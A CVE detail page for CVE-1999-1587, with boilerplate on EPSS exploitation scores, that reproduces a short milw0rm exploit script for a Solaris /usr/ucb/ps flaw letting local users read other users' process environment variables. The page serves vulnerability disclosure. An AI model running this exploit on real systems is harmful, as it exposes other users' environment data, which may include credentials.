CVE-1999-1587 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/bin/sh # # $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $ # # raptor_ucbps - information leak with Solaris /usr/ucb/ps # Copyright (c) 2006 Marco Ivaldi <[email protected]> # # A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow # unprivileged local users the ability to see environment variables and their # values for processes which belong to other users (Sun Alert ID: 102215). # # Absolutely nothing fancy, but it may turn out to be useful;) # # Usage: # $ chmod +x raptor_ucbps # $ ./raptor_ucbps # [...] # # Vulnerable platforms (SPARC): # Solaris 8 without patch 109023-05 [tested] # Solaris 9 without patch 120240-01 [tested] # # Vulnerable platforms (x86): # Solaris 8 without patch 109024-05 [untested] # Solaris 9 without patch 120239-01 [untested] # echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps" echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>" echo /usr/ucb/ps -auxgeww # milw0rm.com [2006-08-22]